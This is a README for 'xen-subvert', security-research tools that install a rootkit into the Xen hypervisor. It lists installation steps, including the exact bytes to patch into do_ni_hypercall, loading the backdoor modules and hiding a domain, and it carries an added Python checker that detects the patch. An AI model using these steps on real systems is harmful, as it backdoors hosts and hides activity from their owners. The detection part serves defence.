xen-subvert-0.8.2, by rafal.wojtczuk@invisiblethingslab.com and others

See the description of the tools in the BH08 presentation/whitepaper. The tools
in the "devel" directory (particularly "xenload") are required by the others.
Set the XENMODDIR environment variable to this directory and possibly include
it in $PATH.

The rootkit installation steps:
1) Using either the "direct_hdd" or the "tg3dma" tool, overwrite the
do_ni_hypercall function with "ff 54 24 04 90 c3" (which is
"call 4(%esp); ret"); use "ff d7" (jmp %rdi) on x86_64
2) Set the correct addresses in devel/xenlib.c; take them from 
/boot/xen-syms-x.y.z or use pattern-matching as described in the
presentation
3) "make" in devel
4) "make" in "seal_backdoor"; xenload seal.o
5) build and load the kernel module in "alloc_scratch", get the value from
/proc/scratch0 (it is the scratch0 parameter to hdebug.xko), then unload the
module
6) set the XENDIR env variable to the "xen" directory in the Xen source code;
if it was not compiled, then run
    ln -s asm-x86 xen-x.x.x/xen/include/asm
in the Xen source tree.
7) "make" in "dr_backdoor"; xenload hdebug.o scratch0=see_above [use_napi=1]
8) optionally, "make" in "xmlist"; 
xenload domlist.o hidden_domain=ID_to_hide
9) for foreign_backdoor instructions see its directory
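
A defender-side check for the modification made in step 1, added here as an
example (it is not part of xen-subvert or its authors' code): it compares the
bytes at do_ni_hypercall in a captured hypervisor memory image against the
trusted build and against the two byte sequences quoted above. It assumes an
"nm"-style symbol listing taken from xen-syms and an already-acquired memory
image; the function names, addresses and sample bytes are constructed.

```python
# Added example: integrity check for do_ni_hypercall. Not xen-subvert code.
import re

# Byte sequences this README says are written over do_ni_hypercall (step 1).
KNOWN_PATCHES = {
    "x86_32": bytes.fromhex("ff54240490c3"),
    "x86_64": bytes.fromhex("ffd7"),
}

def symbol_address(nm_output, name):
    """Return the address of `name` from nm-style text, or None if absent."""
    for line in nm_output.splitlines():
        m = re.fullmatch(r"\s*([0-9a-fA-F]+)\s+\w\s+(\S+)\s*", line)
        if m and m.group(2) == name:
            return int(m.group(1), 16)
    return None

def check_hypercall_stub(image, image_base, nm_output, reference):
    """Compare do_ni_hypercall in a memory image with known-good bytes.

    image      -- bytes captured from hypervisor memory (assumed input)
    image_base -- virtual address corresponding to image[0]
    reference  -- the function's bytes taken from the trusted xen-syms build
    Returns (status, detail); status is "clean", "modified" or "backdoor".
    """
    addr = symbol_address(nm_output, "do_ni_hypercall")
    if addr is None:
        raise ValueError("do_ni_hypercall not in symbol table")
    off = addr - image_base
    if off < 0 or off + len(reference) > len(image):
        raise ValueError("symbol lies outside the captured image")
    live = image[off:off + len(reference)]
    for arch, patch in KNOWN_PATCHES.items():
        if live.startswith(patch):
            return "backdoor", f"{arch} pattern {patch.hex()} at {addr:#x}"
    if live != reference:
        return "modified", f"expected {reference.hex()}, found {live.hex()}"
    return "clean", f"{len(reference)} bytes match at {addr:#x}"

# Constructed sample data: the symbol table, addresses and stub are made up.
SAMPLE_NM = "ff110000 T do_iret\nff110040 T do_ni_hypercall\nff110060 T do_mmu_update\n"
SAMPLE_REF = bytes.fromhex("b8daffffffc3")  # mov $-38,%eax; ret (illustrative)
SAMPLE_BASE = 0xFF110000

def sample_image(stub):
    """Build a 0x80-byte constructed image with `stub` at do_ni_hypercall."""
    img = bytearray(b"\x90" * 0x80)
    img[0x40:0x40 + len(stub)] = stub
    return bytes(img)
```

A "modified" result covers any other change to the stub, so the check does not
depend on the exact bytes listed in this README.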

The code was tested on Fedora Core 6, 7 and 8 on x86_32; the devel tools and
the direct_hdd module were tested on FC8 x86_64 as well.

The xbpldr directory contains the code necessary to load Xen Bluepill.
